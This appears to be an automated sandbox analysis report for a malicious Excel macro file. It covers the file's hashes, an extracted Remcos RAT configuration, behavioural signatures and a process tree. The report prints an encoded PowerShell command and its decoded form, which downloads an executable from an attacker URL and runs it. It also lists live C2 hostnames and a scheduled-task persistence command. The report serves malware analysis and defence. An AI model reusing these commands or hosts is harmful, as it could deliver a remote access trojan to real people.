Analysis
- max time kernel: 150s
- max time network: 148s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 15-04-2021 09:33
- Static task: static1
- Behavioral task: behavioral1
- Sample: SOA.xlsm
- Resource: win7v20210408
General
- Target: SOA.xlsm
- Size: 18KB
- MD5: 5af73df3782494331cb85c3278054f94
- SHA1: f4ddfd5507b0f92caec0588309d75292daa28693
- SHA256: eb065c4072ee30b3644a847c8f28044eb183977f39e1f90de08d098d8dd70eec
- SHA512: 6ee5a826804664593d336a19c317e30f13f9d0d902f75bcef4668b30de08016e23a85575090248a376f5ac1afc36f13f17599b062dcf07da46eb3a8f732a4483
Malware Config
- Extracted (download URL): http://a0532749.xsph.ru/RR.exe
- Extracted: remcos
  C2 hosts: shahzad73.ddns.net:2404, shahzad73.casacam.net:2404
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2704 | 2256 | cmd.exe | EXCEL.EXE
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
    18 | 632 | powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes (pid | process):
    3788 | dWQYX.exe
    3748 | dWQYX.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description | pid | process | target process):
    PID 3788 set thread context of 3748 | 3788 | dWQYX.exe | dWQYX.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid | process):
    2256 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid | process):
    632 | powershell.exe (3 hits)
    3788 | dWQYX.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes (pid | process):
    3748 | dWQYX.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 632 | powershell.exe
    Token: SeDebugPrivilege | 3788 | dWQYX.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes (pid | process):
    2256 | EXCEL.EXE (2 hits)
- Suspicious use of SetWindowsHookEx (15 IoCs)
  Processes (pid | process):
    2256 | EXCEL.EXE (14 hits)
    3748 | dWQYX.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes (description | pid | process | target process):
    PID 2256 wrote to memory of 2704 | 2256 | EXCEL.EXE | cmd.exe (2 hits)
    PID 2704 wrote to memory of 1732 | 2704 | cmd.exe | cmd.exe (2 hits)
    PID 1732 wrote to memory of 632 | 1732 | cmd.exe | powershell.exe (2 hits)
    PID 2256 wrote to memory of 3788 | 2256 | EXCEL.EXE | dWQYX.exe (3 hits)
    PID 3788 wrote to memory of 208 | 3788 | dWQYX.exe | schtasks.exe (3 hits)
    PID 3788 wrote to memory of 3748 | 3788 | dWQYX.exe | dWQYX.exe (10 hits)
Processes (nesting depth as reported; PIDs taken from the signature tables above)
- [1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 2256)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SYSTEM32\cmd.exe (PID 2704)
    Command line: cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
    Decoded -encodedCommand (base64 of UTF-16LE): (New-Object Net.WebClient).DownloadFile('http://a0532749.xsph.ru/RR.exe',($env:Temp)+'\dWQYX.exe')
    This matches the extracted URL in Malware Config and the dropped path C:\Users\Admin\AppData\Local\Temp\dWQYX.exe below.
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe (PID 1732)
      Command line: cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 632)
        Command line: powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Admin\AppData\Local\Temp\dWQYX.exe (PID 3788)
    Command line: C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\schtasks.exe (PID 208)
      Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eHVFQKLt" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp"
      - Creates scheduled task(s)
    - [3] C:\Users\Admin\AppData\Local\Temp\dWQYX.exe (PID 3748)
      Command line: "{path}"
      - Executes dropped EXE
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
Downloads
- C:\Users\Admin\AppData\Local\Temp\dWQYX.exe
  MD5: f31d91bf0dde9b21c9ab64883fe5e022
  SHA1: 675362cb546323a38842f3dbd000def375f9760f
  SHA256: 39fc3bd4df8f4ef4f7ceaa9d41626bf066fa423db69713eaf3105e4bf97fc3da
  SHA512: 0f4e66006d71f37b2179d67a905923868ef0832aefa1929e7d9d0fa9d4ef7278d7509579463ff7b3a3d6f3992f4816c2e82975df5c4ed982d4b1ed6b06071ab9
- C:\Users\Admin\AppData\Local\Temp\tmpE3BE.tmp
  MD5: bbfd93a5e28f4f3510d17606b2769cc8
  SHA1: f997b645cdd0efc248deee2327096fd82579d614
  SHA256: ff15bf6dfe658b8dd2b0a357d5a0b1768f0a2ce1125266d645b374e68ec696ea
  SHA512: 0a52760a5c4cf07387b361e09e6e63cc31aa143688a819581db0d12b75bf4d4fccb14932b87de088c076ece865f6030f5f74c18c76e9b8a109a97ce06fb51a49
- memory/208-189-0x0000000000000000-mapping.dmp
- memory/632-181-0x0000000000000000-mapping.dmp
- memory/632-184-0x000001D7CFC46000-0x000001D7CFC48000-memory.dmp (8KB)
- memory/632-183-0x000001D7CFC43000-0x000001D7CFC45000-memory.dmp (8KB)
- memory/632-182-0x000001D7CFC40000-0x000001D7CFC42000-memory.dmp (8KB)
- memory/1732-180-0x0000000000000000-mapping.dmp
- memory/2256-121-0x00007FF85A170000-0x00007FF85A180000-memory.dmp (64KB)
- memory/2256-123-0x00007FF878CF0000-0x00007FF87ABE5000-memory.dmp (31.0MB)
- memory/2256-122-0x00007FF87ABF0000-0x00007FF87BCDE000-memory.dmp (16.9MB)
- memory/2256-114-0x00007FF6B3180000-0x00007FF6B6736000-memory.dmp (53.7MB)
- memory/2256-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmp (64KB)
- memory/2256-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmp (64KB)
- memory/2256-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmp (64KB)
- memory/2256-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmp (64KB)
- memory/2704-179-0x0000000000000000-mapping.dmp
- memory/3748-191-0x0000000000413FA4-mapping.dmp
- memory/3748-193-0x0000000000400000-0x0000000000421000-memory.dmp (132KB)
- memory/3788-186-0x0000000000000000-mapping.dmp
- memory/3788-188-0x00000000071C0000-0x00000000076BE000-memory.dmp (5.0MB)